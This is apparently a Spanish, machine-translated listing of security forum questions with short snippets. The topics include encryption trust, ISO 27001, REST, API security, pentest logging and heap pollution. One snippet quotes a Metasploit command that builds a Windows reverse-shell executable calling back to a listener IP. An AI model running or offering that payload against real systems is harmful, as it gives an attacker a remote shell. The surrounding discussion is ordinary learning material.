Todas las preguntas

2
respuestas

Cómo verificar y confiar en el software de cifrado de llamadas

Hay una gran cantidad de software para sistemas operativos móviles que proporcionan cifrado de extremo a extremo. ¿Cuál es la mejor manera de decidir cuál es confiable si su fuente no se revela? ¿Invertir los archivos android .apk de inge...
pregunta 01.04.2016 - 14:20
1
respuesta

Almacenar contraseñas de forma segura en un escenario específico

Tengo un entorno de red específico. Es una red DTN (Delay Tolerant Network) sin conectividad continua, situada en el mar, donde los nodos son barcos. También hay un servidor que forma parte de la infraestructura de la tierra, para mayor claridad...
pregunta 15.04.2016 - 18:47
4
respuestas

windows / shell_reverse_tcp exploit no funciona si la escucha aún no se está ejecutando

Estoy usando Metasploit para generar un exploit shell_reverse_tcp usando el siguiente comando: msfpayload windows/shell_reverse_tcp LHOST=192.168.1.171 x > exploit.exe En el lado del oyente estoy usando netcat. Todo es perfecto y si e...
pregunta 23.02.2016 - 10:10
1
respuesta

¿Es posible que una División de una organización obtenga la certificación ISO 27001?

¿Es posible que una entidad o parte de una división de una organización sea certificada ISO 27001 , específicamente el Sistema de gestión de seguridad de la información de la División?     
pregunta 17.04.2016 - 13:27
1
respuesta

REST y estado confidencial: ¿el problema del cliente de confianza, etc.?

Con REST, las sesiones del cliente no se manejan manteniendo el estado del lado del servidor. Cualquier estado de este tipo necesario para llamadas posteriores se pasa al cliente y luego se devuelve al servidor como parte de esas llamadas. En...
pregunta 11.04.2016 - 09:32
2
respuestas

Firma que solo puede ser verificada por el autor y el destinatario, sin clave compartida previamente

Desiderata: Alice quiere enviarle un mensaje a Bob para que lo guarde y pueda consultar, de modo que Bob pueda estar seguro de que el mensaje vino de Alice y no fue manipulado. Alicia también desea guardar una copia del mensaje para que...
pregunta 14.04.2016 - 04:48
1
respuesta

Mejores prácticas para API relativamente simples para nuestros clientes

He estado leyendo mucho sobre muchas consideraciones de seguridad de API, las diferencias en terminología, OAUTH, OpenID, etc. Aunque entiendo su absoluta necesidad cuando se trata de asegurar una API correctamente, me enfrento a mi (quizás inge...
pregunta 21.04.2016 - 15:22
3
respuestas

¿Marcos para recopilar todas las actividades en un pentest?

Trabajo como evaluador de penetración para una empresa, y una cosa que se nos pide con regularidad es proporcionar un registro forense de todas las actividades que realizamos durante el curso de una evaluación. Me pregunto si hay un marco que ad...
pregunta 11.04.2016 - 01:38
2
respuestas

¿Puede un atacante hacer compras dentro de la aplicación de mis productos en su aplicación?

Mi aplicación de iOS necesita almacenar un secreto previamente compartido. No se puede incrustar dentro del propio paquete de aplicaciones porque podría extraerse mediante el análisis estático del paquete. El sistema In-App-Purchase de Apple...
pregunta 07.04.2016 - 08:31
2
respuestas

¿Cómo puede la contaminación de Heap causar una falla de seguridad?

Encontré esta regla en CERT Secure Coding Standart para Java. Heap Pollution . Entiendo que esto puede hacer que el programa lance una excepción en el tiempo de ejecución, pero no puedo entender cómo esto podría causar un problema de seguridad...
pregunta 16.04.2016 - 15:30